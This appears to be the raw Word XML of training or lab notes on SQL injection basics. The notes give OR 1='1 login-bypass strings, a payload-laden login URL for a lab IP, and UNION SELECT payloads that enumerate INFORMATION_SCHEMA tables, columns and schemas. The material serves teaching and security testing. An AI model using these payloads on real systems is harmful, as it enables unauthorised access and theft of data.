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spacing w:after="120" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection Basics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https://dev.mysql.com/doc/refman/8.0/en/information-schema.html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https://dev.mysql.com/doc/refman/8.0/en/information-functions.html#function_database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rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet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76" w:lineRule="auto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https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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SQL Layout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highlight w:val="cyan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--&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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---&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="green"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Columns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color w:val="ffffff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">----&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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Basic SQL Queries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1. SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customers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2. SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="green"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CustomerID, ContactName, City, PostalCode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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customers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  <w:t xml:space="preserve">3. SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="green"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CustomerID, ContactName, City, PostalCode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Customers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WHERE City =</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="blu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'Berlin'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr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4. SELECT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="green"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username, password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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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WHERE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ffffff"/>
          <w:highlight w:val="blue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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highlight w:val="cyan"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user' OR 1='1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:rtl w:val="0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color w:val="ffffff"/>
          <w:highlight w:val="blue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ffffff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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highlight w:val="cyan"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user' OR 1='1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'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5. GOLDEN STATEMENT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333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT table_schema,table_name,column_name from information_schema.columns;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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource:</w:t>
      </w:r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80"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_all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pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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Determining how to submit information to the web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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Submit through the text boxes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:pageBreakBefore w:val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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Modify the URL params</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pageBreakBefore w:val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b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.50.24.218/login.php?username=user’ OR 1=’1&amp;passwd=user OR 1=’1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pageBreakBefore w:val="0"/>
        <w:rPr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pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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Injections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' (single quotes) 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none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to close off quotations added in the back end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OR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u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the logic of the query to make something else true.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1=1, 2=2, etc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u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The value tested to be true by the OR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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none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b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Underlying Query (Cannot be changed) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User inputted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b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name, user, pass, token FROM authentication WHERE user = '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0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b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name, user, pass, token FROM authentication WHERE user = '</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bacon'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1='1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0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highlight w:val="red"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bacon </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is false because that value does not exist in the table, but </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is true because it is mathematically correct. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="blue"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement requires </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">only one side of the comparison to be true</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order evaluate the query has True!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pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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Determining how to submit information to the web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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Submit through the text boxes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:pageBreakBefore w:val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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Modify the URL params</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:pageBreakBefore w:val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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gjdgxs" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.50.24.218/login.php?username=user’ OR 1=’1&amp;passwd=user OR 1=’1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Enumerating SQL via Information Schema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Liberation Serif" w:cs="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif"/>
            <w:b w:val="0"/>
            <w:i w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:color w:val="00008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https://dev.mysql.com/doc/refman/5.7/en/information-schema.html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bacon' UNION SELECT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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TABLE_NAME,2,3,4,5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 FROM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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORMATION_SCHEMA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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TABLES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;#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bacon' UNION SELECT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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COLUMN_NAME,2,3,4,5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 FROM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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORMATION_SCHEMA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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COLUMNS;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bacon' UNION SELECT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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCHEMA_NAME,2,3,4,5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 FROM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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORMATION_SCHEMA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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCHEMATA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;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:num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Process for testing for vulnerabilities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Locate a place were data can be sent to the server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Attempt to modify the logic of the underlying query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Enumerate the database with a UNION attack!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Use data from union attacks, union select the needed information from the server.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72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4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color w:val="00000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120" w:before="20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pageBreakBefore w:val="0"/>
      <w:spacing w:after="120" w:before="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:cs="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans"/>
      <w:b w:val="1"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="1"/>
      <w:bidi w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:cs="Mangal" w:eastAsia="SimSun" w:hAnsi="Liberation Serif"/>
      <w:color w:val="00000a"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="hi-IN" w:eastAsia="zh-CN" w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:qFormat w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="120" w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:qFormat w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="120" w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Internet Link"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
      <w:lang w:bidi="zxx" w:eastAsia="zxx" w:val="zxx"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NumberingSymbols">
    <w:name w:val="Numbering Symbols"/>
    <w:qFormat w:val="1"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:cs="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel2">
    <w:name w:val="ListLabel 2"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel3">
    <w:name w:val="ListLabel 3"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel4">
    <w:name w:val="ListLabel 4"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel5">
    <w:name w:val="ListLabel 5"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel6">
    <w:name w:val="ListLabel 6"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel7">
    <w:name w:val="ListLabel 7"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel8">
    <w:name w:val="ListLabel 8"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel9">
    <w:name w:val="ListLabel 9"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel10">
    <w:name w:val="ListLabel 10"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel11">
    <w:name w:val="ListLabel 11"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel12">
    <w:name w:val="ListLabel 12"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel13">
    <w:name w:val="ListLabel 13"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel14">
    <w:name w:val="ListLabel 14"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel15">
    <w:name w:val="ListLabel 15"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel16">
    <w:name w:val="ListLabel 16"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel17">
    <w:name w:val="ListLabel 17"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel18">
    <w:name w:val="ListLabel 18"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel19">
    <w:name w:val="ListLabel 19"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel20">
    <w:name w:val="ListLabel 20"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel21">
    <w:name w:val="ListLabel 21"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel22">
    <w:name w:val="ListLabel 22"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel23">
    <w:name w:val="ListLabel 23"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel24">
    <w:name w:val="ListLabel 24"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel25">
    <w:name w:val="ListLabel 25"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel26">
    <w:name w:val="ListLabel 26"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel27">
    <w:name w:val="ListLabel 27"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:cs="OpenSymbol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Mangal" w:eastAsia="Microsoft YaHei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88" w:lineRule="auto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Mang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Mangal"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Heading"/>
    <w:qFormat w:val="1"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:bCs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ev.mysql.com/doc/refman/5.7/en/information-schema.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_al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ev.mysql.com/doc/refman/8.0/en/information-schema.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-she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cO8nb9pKGB++zP1TBKwdF27t/Q==">AMUW2mV5vNrpoUQe2Po56J++CTWQXu+bs3PkPoFD13qISFVJuJt5JhrQy4nLB0efR7zVZX67ymo4ZdTFJcXh3B+dExrJwhL3ziRyByZLSzZABb8gZikPD4Hm9+pV4gxbNhNu5X/j33TP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2020-05-14T08:53:25Z</dcterms:created>
</cp:coreProperties>
</file>